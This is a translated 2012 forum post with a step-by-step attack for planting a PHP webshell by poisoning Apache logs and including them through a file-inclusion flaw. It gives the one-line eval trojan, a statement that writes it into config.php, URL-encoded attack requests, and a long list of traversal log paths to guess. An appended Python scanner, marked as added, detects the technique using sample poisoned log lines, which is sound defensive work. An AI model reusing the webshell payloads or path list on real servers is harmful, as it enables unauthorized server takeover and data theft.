PHP include: writing a webshell via the Apache log

Original poster, posted 2012-9-15 14:27:40
Because the method above is very impractical (in my testing I found the logs were routinely tens of megabytes, which made it no fun to play with), let's think one step further: we write a real, practical webshell to use, which is also far better than the painfully slow approach above.

For example, take the same one-line trojan again:
<?eval($_POST[cmd]);?>

By now you may already see that this is a pretty good approach. Read on: how to write it becomes the question. Use this statement:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes in the one-line trojan server-side statement <?eval($_POST[cmd]);?>. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,'<?eval($_POST[cmd]);?>');fclose($fp);?>   // write the one-line trojan statement into config.php; the string is single-quoted so PHP does not interpolate $_POST[cmd] when writing it

We submit this statement, have Apache record it in the error log, then include the log and the shell is written successfully. Remember it must be converted to URL-encoded form to succeed.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E
This way the error log records this line of webshell-writing code.
Now we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written successfully; the one-line trojan statement is now in config.php.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Just connect with lanker's client and the host is yours.

PS: The prerequisite for the above is that the directory permissions must be writable; it must be -rwxrwxrwx (777) to proceed, and here you can check that directly against the directory listed above. Everything above assumes the log path is already known.
For other log paths, you can guess, or refer to this list.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
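Detection-side counterpart, added here and not part of the original post: a Python scanner that flags both steps the post describes, the PHP payload smuggled into the Apache log and the later include of a log path (including the traversal forms from the list above) through a vulnerable parameter. The sample log lines, the reuse of the post's `zizzy` parameter name, and the `/tmp/c.php` path are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Markers of PHP code planted in a request, checked after full URL-decoding.
PHP_CODE = re.compile(
    r"<\?(php|=)?|\beval\s*\(|\bfopen\s*\(|\bfputs\s*\(|\$_(POST|GET|REQUEST)\[", re.I)
# Log file names an attacker includes once the payload has been logged.
LOG_TARGET = re.compile(r"(^|/)(acces|access|error|www-error)[._]?log$", re.I)

# Constructed sample lines (not from the post): the poisoning request as the
# access log keeps it (still percent-encoded), the same request as the error
# log records it (decoded), the include of the log through the vulnerable
# parameter, and a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Sep/2012:14:27:40 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22%2Ftmp%2Fc.php%22%2C%22w%2B%22%29%3B%3F%3E HTTP/1.1" 404 202',
    '[Sat Sep 15 14:27:40 2012] [error] [client 10.0.0.5] File does not exist: /var/www/<?$fp=fopen("/tmp/c.php","w+");?>',
    '10.0.0.5 - - [15/Sep/2012:14:28:01 +0800] "GET /z.php?zizzy=../../../../var/log/apache/error_log HTTP/1.1" 200 9001',
    '10.0.0.6 - - [15/Sep/2012:14:28:05 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 5120',
]

def decode_fully(value):
    """Percent-decode until stable, so double-encoded %253C%253F also yields <?."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def classify(line):
    """Return the findings for one access- or error-log line (empty if benign)."""
    uris = re.findall(r'"(?:GET|POST|HEAD) (\S+)', line)        # access log format
    uris += re.findall(r"File does not exist: (\S+)", line)      # error log format
    findings = []
    for raw in uris:
        if PHP_CODE.search(decode_fully(raw)):
            findings.append("log-poisoning: PHP code in request")
        for values in parse_qs(urlparse(raw).query).values():
            for v in map(decode_fully, values):
                if "../" in v or LOG_TARGET.search(v):
                    findings.append("lfi: include of log file via " + v)
    return findings

def scan(lines):
    """Map each suspicious line's index to its findings; benign lines are omitted."""
    return {i: f for i, f in enumerate(map(classify, lines)) if f}

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LOG).items():
        print(i, findings)
```

Feed real access_log and error_log lines through `scan` to see the two halves of the technique as they appear on the defender's side: the poisoning request is visible before the include ever happens, so it is the earlier signal to alert on.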